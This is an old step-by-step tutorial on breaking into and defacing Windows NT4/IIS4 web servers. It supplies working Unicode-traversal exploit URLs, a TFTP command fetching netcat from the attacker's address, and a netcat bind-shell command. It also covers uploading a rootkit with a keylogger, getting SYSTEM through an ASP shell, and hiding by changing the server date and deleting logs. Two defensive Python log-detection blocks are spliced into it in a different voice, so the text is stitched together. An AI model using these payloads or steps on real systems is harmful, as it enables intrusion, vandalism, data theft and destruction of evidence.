Tutorial - NT4/IIS4 Dface Step-by-Step
Version - 1.1
Compiled by - DoX (aka razka and eXist)
Email - dimspyder@hushmail.com
Date - 6/6/01 (Updated 1/6/02)

========================================

First off you need to find a site you want to tag that is running Windows NT4 with IIS/4.0. To do this, compile a list of sites with neat, unique domain names, or just generic ones; it doesn't really matter much. Now get on over to http://uptime.netcraft.com and over on the left there is a little window that says "What's that site running?". You plug in the domain without the http:// and, if you're lucky, you will see:

    The site www.****.com is running Microsoft-IIS/4.0 on NT4/Windows 98.

The next step is seeing whether it has any chance of being vulnerable to any number of attacks. There are many different ways to gain access to an NT4/IIS4 box, but I will only cover the main ways that I am currently exploiting: the "Microsoft IIS and PWS Extended Unicode Directory Traversal Vulnerability" and the "Microsoft IIS Executable File Parsing Vulnerability", which are fully explained at www.securityfocus.com.

Now it is time to load up your browser with an anonymous proxy server to hide your IP Address from the w3svc logs. Proxy lists are available at http://www.multiproxy.org and you can test your proxy by visiting http://www.stilllistener.addr.com/checkpoint1/index.shtml.

Next, take the URL of the site you wish to tag and place these directory extensions after the full domain name, looking for an HTTP Error 403 (403.2 Forbidden: Read Access Forbidden):

    /cgi-bin/
    /iisadmpwd/
    /scripts/
    /msadc/
    /_vti_bin/
    /_vti_cnf/
    /_vti_pvt/

That will tell you which Unicode exploit will most likely work with that site (NOTE: These will not always work, depending on whether the NT4 server is up to date with its patches).
If it shows up for www.bitchbox.com/cgi-bin/ then use this exploit (which is hexed to evade most IDS that may be on the box, as are the rest I'm about to show):

    www.bitchbox.com/cgi-bin/%2e%2e%c0%af%2e%2e/%2e%2e%c0%af%2e%2e/%2e%2e%c0%af%2e%2e/%77%69%6e%6e%74/%73%79%73%74%65%6d%33%32/%63%6d%64%2e%65%78%65?/c+dir+c:\

If it shows up for www.bitchbox.com/iisadmpwd/ then use this exploit:

    www.bitchbox.com/iisadmpwd/%2e%2e%c0%af%2e%2e/%2e%2e%c0%af%2e%2e/%77%69%6e%6e%74/%73%79%73%74%65%6d%33%32/%63%6d%64%2e%65%78%65?/c+dir+c:\

If it shows up for www.bitchbox.com/scripts/ then use this exploit:

    www.bitchbox.com/scripts/%2e%2e%c0%af%2e%2e/%77%69%6e%6e%74/%73%79%73%74%65%6d%33%32/%63%6d%64%2e%65%78%65?/c+dir+c:\

If it shows up for www.bitchbox.com/msadc/ then use this exploit:

    www.bitchbox.com/msadc/%2e%2e%c0%af%2e%2e/%2e%2e%c0%af%2e%2e/%2e%2e%c0%af%2e%2e/%77%69%6e%6e%74/%73%79%73%74%65%6d%33%32/%63%6d%64%2e%65%78%65?/c+dir+c:\

If it shows up for www.bitchbox.com/_vti_bin/ then use this exploit:

    www.bitchbox.com/_vti_bin/%2e%2e%c0%af%2e%2e/%2e%2e%c0%af%2e%2e/%2e%2e%c0%af%2e%2e/%2e%2e%c0%af%2e%2e/%2e%2e%c0%af%2e%2e/%77%69%6e%6e%74/%73%79%73%74%65%6d%33%32/%63%6d%64%2e%65%78%65?/c+dir+c:\

If it shows up for www.bitchbox.com/_vti_cnf/ then use this exploit:

    www.bitchbox.com/_vti_cnf/%2e%2e%c0%af%2e%2e/%2e%2e%c0%af%2e%2e/%2e%2e%c0%af%2e%2e/%2e%2e%c0%af%2e%2e/%2e%2e%c0%af%2e%2e/%77%69%6e%6e%74/%73%79%73%74%65%6d%33%32/%63%6d%64%2e%65%78%65?/c+dir+c:\

If it shows up for www.bitchbox.com/_vti_pvt/ then use this exploit:

    www.bitchbox.com/_vti_pvt/%2e%2e%c0%af%2e%2e/%2e%2e%c0%af%2e%2e/%2e%2e%c0%af%2e%2e/%2e%2e%c0%af%2e%2e/%2e%2e%c0%af%2e%2e/%77%69%6e%6e%74/%73%79%73%74%65%6d%33%32/%63%6d%64%2e%65%78%65?/c+dir+c:\

These all invoke cmd.exe from the path %systemroot%\winnt\system32\cmd.exe and run the directory (dir) command to display the contents of c:\ (NOTE: This can be changed to any drive letter and still display properly).
The dir command can also be exchanged with almost any other DOS command and still work. The most common commands I am forced to use with this are dir (directory), type (displays the contents of files), and del (delete).

Now once I gain access to the directory information, I usually snoop around some. First I check for logs with this command:

    dir c:\*.log /S

(placed at the end of the Unicode string this would be /c+dir+c:\*.log+/S, with the spaces replaced with "+"). The c:\ can be substituted with anything through z:\ and it will still work properly as long as a drive exists there. The log files you are looking for usually reside in %systemroot%\winnt\system32\logfiles\, %webroot%\logfiles\, or any variation of those two (NOTE: This is not always the case. I have found log files on an obscure drive letter such as g:\ and have also found them in other strange places. That is why I do the directory search for *.log to find EVERY log on that drive).

Once you find the correct logs, which are usually in a sub-directory of %systemroot%\winnt\system32\logfiles\w3svc*\, check their dates and see how often they roll over (NOTE: Most roll over at 12 midnight, but once again, there are always exceptions). This is useful information later on when you actually get your own IP Address involved. So far you should have been using a proxy server to hide your IP Address, so there is little reason to worry about this yet.

The best way to tell which w3svc directory holds the logs for the site you are accessing is to use the "type" command on the log files (which displays their contents). The syntax for that command would be (only an example):

    type c:\winnt\system32\logfiles\w3svc4\ex010606.log

(once again, when used with Unicode, replace each space with "+"). ex010606.log is the log for the date 06/06/01, and while it is in use (being written to by the w3svc) it cannot be deleted. This will come more into play later when I explain how to delete the logs.
The output of the above command will look like this (only an example):

    #Software: Microsoft Internet Information Server 4.0
    #Version: 1.0
    #Date: 2001-06-06 00:00:09
    #Fields: date time c-ip cs-username s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query sc-status cs-win32-status sc-bytes cs-bytes time-taken s-port cs-version cs(User-Agent) cs(Cookie) cs(Referer)
    2001-06-06 00:00:09 208.219.77.29 - W3SVC4 NEWTON 207.136.232.43 HEAD /html/goals/tsld001.htm - 200 0 245 175 0 80 HTTP/1.1 Gulliver/1.3 - -
    2001-06-06 00:00:18 208.219.77.29 - W3SVC4 NEWTON 207.136.232.43 HEAD /html/vol103.htm - 200 0 247 172 0 80 HTTP/1.1 Gulliver/1.3 - -
    2001-06-06 00:01:10 208.219.77.29 - W3SVC4 NEWTON 207.136.232.43 HEAD /html/goals/tsld002.htm - 200 0 246 175 0 80 HTTP/1.1 Gulliver/1.3 - -

By reading the #Fields header you should see that the first IP Address shown in each line (c-ip) is the person accessing the site and the second (s-ip) is the machine you are currently trying to exploit. In it, in plain text, is the directory you were accessing along with a lot of other useful information for anyone trying to find out more about what you were doing on their box. Once you gain a more interactive "command shell" you will be able to get rid of the evidence in the logs. This topic will be re-introduced later on.

========================================
Enough of the bullshit, time for the real parts...
========================================

OK, now you need a new instance of the command interpreter copied from the original (which is at %systemroot%\winnt\system32\cmd.exe), which will usually give you higher privileges than were available with the original instance. This is because cmd.exe adheres to the privileges of the directory it resides in (thus the escalation of sorts) when it is moved to another directory with higher privileges and is called upon to execute commands.
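From the defender's side, the Unicode strings above and the w3svc log format above are enough to write a detector. The following Python is an added example (not part of this tutorial or of any tool it names): it decodes the %c0%af overlong form the way the vulnerable IIS decoder did and flags log entries that reach cmd.exe or the copied tools; the sample log lines are constructed, and the byte-handling rule in decode_iis_path is an assumption about IIS's decoder.

```python
"""Added example, not from the tutorial: decode the overlong-UTF-8 traversal
strings shown above and run a detector over W3C extended log lines in the
w3svc format shown above.  Sample log lines are constructed."""
import re
from urllib.parse import unquote_to_bytes

def decode_iis_path(raw):
    """Percent-decode, then collapse 2-byte overlong UTF-8 (%c0%af -> '/',
    %c1%9c -> '\\') as the vulnerable IIS decoder did after its '..' check.
    Assumes IIS took the low six bits of whatever byte followed 0xC0/0xC1."""
    data = unquote_to_bytes(raw)
    out = bytearray()
    i = 0
    while i < len(data):
        if data[i] in (0xC0, 0xC1) and i + 1 < len(data):
            out.append(((data[i] & 0x1F) << 6) | (data[i + 1] & 0x3F))
            i += 2
        else:
            out.append(data[i])
            i += 1
    return out.decode("latin-1")

def parse_w3c(lines):
    """Yield one dict per request, keyed by the most recent #Fields header."""
    fields = None
    for line in lines:
        line = line.rstrip("\r\n")
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split(" ")
            if len(values) == len(fields):
                yield dict(zip(fields, values))

TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
# Binaries and pages the tutorial copies into, or calls through, the web root.
SUSPECT_NAMES = {"cmd.exe", "cmd1.exe", "tftp.exe", "ncx99.exe",
                 "cmd.asp", "bewm.asp"}

def classify(entry):
    """Reason string if the request matches the attack pattern, else None."""
    stem = decode_iis_path(entry.get("cs-uri-stem", ""))
    query = decode_iis_path(entry.get("cs-uri-query", "-")).replace("+", " ")
    name = re.split(r"[\\/]", stem)[-1].lower()
    if name in SUSPECT_NAMES:
        how = "traversal to" if TRAVERSAL.search(stem) else "direct call of"
        return f"{how} {stem} args={query!r}"
    return None

def scan(lines):
    """Return [(client ip, reason)] for every suspicious request in the log."""
    return [(e["c-ip"], r) for e in parse_w3c(lines) if (r := classify(e))]

# Constructed sample: the #Fields header and first request come from the
# excerpt above; the last line is a made-up hit from a private address.
SAMPLE_LOG = [
    "#Fields: date time c-ip cs-username s-sitename s-computername s-ip "
    "cs-method cs-uri-stem cs-uri-query sc-status cs-win32-status sc-bytes "
    "cs-bytes time-taken s-port cs-version cs(User-Agent) cs(Cookie) cs(Referer)",
    "2001-06-06 00:00:09 208.219.77.29 - W3SVC4 NEWTON 207.136.232.43 HEAD "
    "/html/goals/tsld001.htm - 200 0 245 175 0 80 HTTP/1.1 Gulliver/1.3 - -",
    r"2001-06-06 03:14:07 10.0.0.5 - W3SVC4 NEWTON 207.136.232.43 GET "
    r"/scripts/..%c0%af../winnt/system32/cmd.exe /c+dir+c:\ 200 0 1532 211 "
    "40 80 HTTP/1.1 Mozilla/4.0 - -",
]
```

Note that when the request came through a proxy as the tutorial recommends, c-ip is the proxy's address, so the hit still tells you what was run but not by whom.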
You will need to copy the new instance of cmd.exe to any number of other directories (such as %webroot%\scripts\ or %systemroot%\progra~1\common~1\system\msadc\). This is done with the following Unicode string if the /scripts/ directory was vulnerable to attack and it was hosted on c:\ (different for each site):

    www.bitchbox.com/scripts/%2e%2e%c0%af%2e%2e/%77%69%6e%6e%74/%73%79%73%74%65%6d%33%32/%63%6d%64%2e%65%78%65?/winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\cmd1.exe

This would place the new command instance (cmd1.exe) in the c:\inetpub\scripts\ directory and would allow you to access it to run commands or programs from:

    www.bitchbox.com/scripts/%2e%2e%c0%af%2e%2e/%77%69%6e%6e%74/%73%79%73%74%65%6d%33%32/%63%6d%64%2e%65%78%65?/inetpub/scripts/cmd1.exe?/c+dir+c:\

Once you have snooped around on the box enough to decide whether it is susceptible to attack and whether it is even worth it, you must upload your tools. There are 2 main ways to do this. The first way I will tell you about I do not use, because it is unstable and there are easier ways to do the same thing. But here goes anyway...

TFTP will be the first. This can easily be done via your web browser using a Unicode string similar to the ones previously shown (once again calling cmd.exe [cmd1.exe this time] and executing a program). The program you execute is tftp.exe, which is included by default in all NT4 installs and resides at %systemroot%\winnt\system32\tftp.exe. To run it you would use the Unicode string that works for the site you are trying to 0wn (e.g. the /scripts/ or /msadc/ one, or any other for that matter). First you will need to get a TFTP daemon running on your own computer to accept connections from the bitch box. Go to your nearest local TFTPD.exe dealer and grab one at the low price of....ah who gives a fuck, just go find one to download (http://www.download.com and search for "tftpd").
The following example is the string you would use to get netcat onto the bitch box using TFTP remotely if the /scripts/ directory was vulnerable to attack and it was hosted on c:\ (Remember: different for each site, and have your tftp daemon running!!!):

    www.bitchbox.com/scripts/%2e%2e%c0%af%2e%2e/%77%69%6e%6e%74/%73%79%73%74%65%6d%33%32/%63%6d%64%2e%65%78%65?/winnt/system32/tftp.exe+"-i"+xxx.xxx.xxx.xxx+GET+c:\rootkit\ncx99.exe+c:\winnt\system32\ncx99.exe

Substitute xxx.xxx.xxx.xxx with your own IP Address, change the first directory to the one netcat resides in on your local computer, and change the last directory to whichever directory you want netcat uploaded to. Once it is uploaded you would run it with this Unicode string:

    www.bitchbox.com/scripts/%2e%2e%c0%af%2e%2e/%77%69%6e%6e%74/%73%79%73%74%65%6d%33%32/%63%6d%64%2e%65%78%65?/winnt/system32/cmd.exe?/c+c:\winnt\system32\ncx99.exe+-L+-p+23+-t+-e+cmd1.exe

(use the correct netcat syntax for your current situation). The syntax above makes netcat listen on the bitch box on port 23 (telnet default), and when a client connects it spawns a shell (cmd1.exe, which has escalated privileges). The -t option tells Netcat to handle any telnet negotiation the client might expect. The -L (note the capital L) option restarts Netcat with the same command line when the connection is terminated, so you can connect over and over to the same Netcat process. The -p option just tells netcat to listen on the port number that follows (23 in this case), and the -e option executes the program that follows (cmd1.exe in this case). Once you're on netcat you can do whatever it is you want, but I'm not going to bother explaining the rest. It should make sense, and if it doesn't then just go get a copy of netcat from somewhere and read the readme.txt file included, because I don't feel like explaining that.
I'm more interested and active in the upcoming section's information anyway, because it allows the whole attack to be conducted via your web browser (many people find this lame, but I found it interesting how one could 0wn a box all from their web browser).

========================================
Now to the REAL good shit....
========================================

First you will have to get a Perl script called uploader.pl (I use an old modified one called bewm.pl). The only modifications to this old uploader.pl script were done by b1t. He changed the original code to have more strings and also hexed them to evade IDS. The uploader.pl source needs to be edited depending on which of the box's vulnerable directories you wish to exploit. In the source are the 7 main vulnerable directories that I mentioned previously, and depending on which one the bitch box is vulnerable to, that one should be placed at the top above the others. If you have the uploader.pl then you will know what I'm talking about, and if you don't, then that's too bad. GO FIND ONE.

OK, now I'm not going to explain how the uploader.pl works (look at the source if you want to know, it's rather simple), but I will give you general information. When run, it asks for the bitch box's IP Address and port, and also asks for the %webroot% to upload files to. This is where you remember which directory was vulnerable and gave you an HTTP Error 403 (403.2 Forbidden: Read Access Forbidden). That is the directory you will enter as the %webroot% when prompted. The script uses the Unicode string that the vulnerable box is susceptible to (the one you placed at the top of the list), makes a copy of cmd.exe from %systemroot%\winnt\system32\cmd.exe and places it in the vulnerable directory (such as %webroot%\scripts\ or %systemroot%\progra~1\common~1\system\msadc\) under the name bewm.exe.
Then the script tries to upload 2 important files to the bitch box, which must be located in the same directory as the uploader.pl for it to work. The 2 files are bewm.inc and bewm.asp, which both come with the bewm.pl "package" (with different names originally, of course). If the upload of these 2 files to the %webroot% you specified is successful then the script will complete and exit.

Now to get access to the 2 uploaded files. They both need to be in the same directory to work (which they are unless you move them around) and they must be in a directory that has the "execute scripts and executables" permission enabled. The %systemroot%\progra~1\common~1\system\msadc\ and %webroot%\scripts\ directories both have that enabled by default, so they should be the first you try. If you uploaded them to one of those directories already then just plug www.bitchbox.com/msadc/bewm.asp or www.bitchbox.com/scripts/bewm.asp into your browser and you will see one of my favorite sites to see, a browse and upload page. If it doesn't work from that directory then move them around with Unicode strings in your browser (different for each box):

    www.bitchbox.com/scripts/%2e%2e%c0%af%2e%2e/%77%69%6e%6e%74/%73%79%73%74%65%6d%33%32/%63%6d%64%2e%65%78%65?/c+copy+c:\inetpub\scripts\bewm.asp+c:\inetpub\wwwroot\cgi-bin\bewm.asp

Don't forget the bewm.inc (the heart of your new upload page):

    www.bitchbox.com/scripts/%2e%2e%c0%af%2e%2e/%77%69%6e%6e%74/%73%79%73%74%65%6d%33%32/%63%6d%64%2e%65%78%65?/c+copy+c:\inetpub\scripts\bewm.inc+c:\inetpub\wwwroot\cgi-bin\bewm.inc

Well, if you can't figure out this shit then you're fucked, because your IP Address is all over the w3svc logs and you don't have an upload page to upload your tools!!!! If this happens to you it is best to wait a day or so and check back on the box using Unicode strings to delete the logs. Remember I told you they usually roll over every 24 hours.
Well, here's hoping they do, because sometimes they don't roll over for a week or a month. It all depends on the box. That is why I snoop around before I commit to the box. Once you run the bewm.pl script on the box, your IP Address is in the logs and there is nothing you can do about it. Before that time you should hopefully have been using a proxy to hide your IP Address from the logs.

OK, let's say you were successful and were able to access your bewm.asp page, fine, great, yay.... now comes the fun part. This is where you get to browse the contents of your computer via your browser using the bewm.asp and upload ANY file you want to the bitch box. All the uploaded files will be placed in the same directory the bewm.asp and bewm.inc are in. I usually upload my whole NT4 "rootkit" to the bitch box. You never know what you might need to use on it, so it's best to have everything you would ever need (plus it's less than 500KB). The files I upload are:

    fport.exe   - Reports all open TCP/IP and UDP ports and maps them to the owning application (124KB).
    fscan.exe   - Very fast command line port scanner to launch from the bitch box (16.5KB).
    fpipe.exe   - Command line port redirector (11KB).
    icmd.exe    - Very small telnet server (36KB).
    klogger.exe - Very small key logger (32KB).
    ncx99.exe   - NT version of Netcat (58KB).
    whoami.exe  - Displays your user credentials (65KB).
    tlist.exe   - Displays all currently running processes (39.7KB).
    kill.exe    - Kills any running process by its PID number (34.7KB).
    cmd.asp     - An interactive command prompt from an ASP file that escalates your privileges to NT AUTHORITY\SYSTEM (approx. 1KB).

    Total size  - 417.9KB

You will have to find these files on your own; they are available at www.foundstone.com, www.securityfocus.com, www.dogmile.com and a few other places.
Once these are up, use your browser (with a proxy) to visit the cmd.asp page, which should be in the same dir as the bewm.asp (different for each box):

    www.proxy.com/www.bitchbox.com/scripts/cmd.asp

The two main proxies I use to do this are https://www.secureweb.com/ and http://anon.free.anonymizer.com/, by just placing the web address you want to visit after those URLs like shown above. To run commands from your new cmd.asp page, you just enter them as if it were a command shell, using the full path of a .exe to execute it (e.g. c:\inetpub\scripts\tlist.exe).

Once you figure out how to get that page up, the first thing you should do is use whoami.exe and see if your user credentials are NT AUTHORITY\SYSTEM; if not, then either you fucked up or the web administrator did not install IIS/4.0 with the default options enabled. If you do have the escalated privileges then use tlist.exe and view all running processes, looking for daemons, loggers, or any other interesting processes (like PC Anywhere). If there are any that you do not want running, then use kill.exe followed by the PID number to kill that process.

Next you will hopefully recall the directory the logfiles were in, which you MUST delete before the administrator notices something strange and investigates them for hax0rz. If you do not wish to wait for the logs to flip before deleting them, you just use the "date" command to change the date on the bitch box, which causes the logs to roll over once a web page is accessed. The command you would use to change the date is:

    date 02-02-98

Then you would access the main page through a proxy, causing the logs to roll over. Then you are able to "dir" to the directory they are in and delete them at will. Remember, if you are doing this during the day, the administrator may hear the disk drives spin when you delete a huge number of logs. I usually try to delete just the ones from the day I was on, or I wait until night and delete them all.
Make sure you check all the directories the logs may be in, just like I showed you earlier, by running this command for each existing drive (C:\ - Z:\; yes, sometimes there is a Z:\ with log files hidden there for the exact reason that nobody thinks to check there):

    dir c:\*.log /S

And if you're feeling super nice and want to free up some space for the web administrator (sometimes over a gig of logs), then just use this command for each existing drive:

    del c:\*.log /S

This might take a while or even hang the cmd.asp page if you are using it to execute these commands. If that occurs then just reload the page and try again. Be sure to tracert the bitch box to see what country and time zone they are in before you do all this.

Now that the logs are cleared and all your tools are on the bitch box, it is officially "BITCHED". Now you have free rein over the whole box and can execute any command you wish in a number of different ways (cmd.asp, ncx99.exe, or icmd.exe). If you wish, you may now make an HTML page with some pictures and upload them to the bitch box via bewm.asp, then use the cmd.asp page to move them over to the %webroot%. Just rename the index.htm/asp or default.htm/asp to anything you want and rename yours to the original name. Simple as that. Make sure the paths in the source of your web page actually point to the pictures (I suggest moving them all to the %webroot% directory and using a plain image tag with just the file name in the source; as long as they are in the same directory it will show up on the page). But I usually wait a week or so before tagging the box so that I have the chance to mess around with my tools and experiment a little. Who knows what you will find on them, maybe some nice CC# databases or a whole pr0n directory, but just remember to have fun, and ALWAYS EXPECT THE UNEXPECTED!!!
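The rollover trick and the *.log deletion above leave traces an administrator can check for: a daily log whose ex{yymmdd} name does not match when it was last written, and missing days in the series. The following Python is an added example, not from this tutorial: it audits a constructed w3svc directory listing for both, assuming daily logging (the tutorial's "most roll over at midnight" case).

```python
"""Added example, not from the tutorial: sanity-check a w3svc log directory
for what the clock-change rollover and the *.log deletion leave behind, a
daily log whose embedded date disagrees with its write time and gaps in the
ex{yymmdd}.log series.  Assumes daily logging; the listing is constructed."""
import re
from datetime import date, datetime

LOG_NAME = re.compile(r"^ex(\d{2})(\d{2})(\d{2})\.log$", re.IGNORECASE)

def name_date(filename):
    """Date encoded in a daily IIS log name (ex010606.log), else None."""
    m = LOG_NAME.match(filename)
    if not m:
        return None
    yy, mm, dd = (int(x) for x in m.groups())
    return date(1900 + yy if yy >= 70 else 2000 + yy, mm, dd)

def audit_logs(listing, max_skew_days=1):
    """listing: [(filename, last-modified datetime)] for one w3svc* directory.
    Returns human-readable findings; an empty list means nothing looks odd."""
    findings, in_series = [], []
    for name, mtime in listing:
        d = name_date(name)
        if d is None:
            continue
        # A file named for 1998 but last written in 2001 means the clock was
        # set back ('date 02-02-98' above) when IIS opened it.
        if abs((mtime.date() - d).days) > max_skew_days:
            findings.append(f"{name}: named for {d} but last written {mtime.date()}")
        else:
            in_series.append(d)
    in_series.sort()
    # Daily logs on a live site should be consecutive; missing days were
    # deleted (a day with zero requests is the benign explanation).
    for prev, cur in zip(in_series, in_series[1:]):
        if (cur - prev).days > 1:
            findings.append(f"{(cur - prev).days - 1} day(s) missing between {prev} and {cur}")
    return findings

# Constructed listing: a run of normal logs with June 3 and 4 removed, plus
# the file the clock change created while the date was set to 1998.
SAMPLE_LISTING = [
    ("ex010601.log", datetime(2001, 6, 1, 23, 59, 58)),
    ("ex010602.log", datetime(2001, 6, 2, 23, 59, 40)),
    ("ex010605.log", datetime(2001, 6, 5, 23, 58, 2)),
    ("ex010606.log", datetime(2001, 6, 6, 23, 58, 40)),
    ("ex980202.log", datetime(2001, 6, 6, 23, 59, 12)),
    ("readme.txt", datetime(2000, 1, 1)),
]
```

Weekly (exyymmww) and monthly (exyymm) logs do not fit the daily pattern, so point this only at directories the tutorial's midnight-rollover assumption actually holds for.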
=========================================
Denial of eXistence 2k+1
=========================================

Greets: cbb, b1t, daemonx, AhnuNahki, skitch, Archim3DES1, obzerve, blachz, The-Rev, orbit43, ezs, nu|L, {swat}, joe, tri0, Teck7, dustin, dgram, Tormented Box, 0xff, Trippin' Smurfs, Fux0r Inc.

=========================================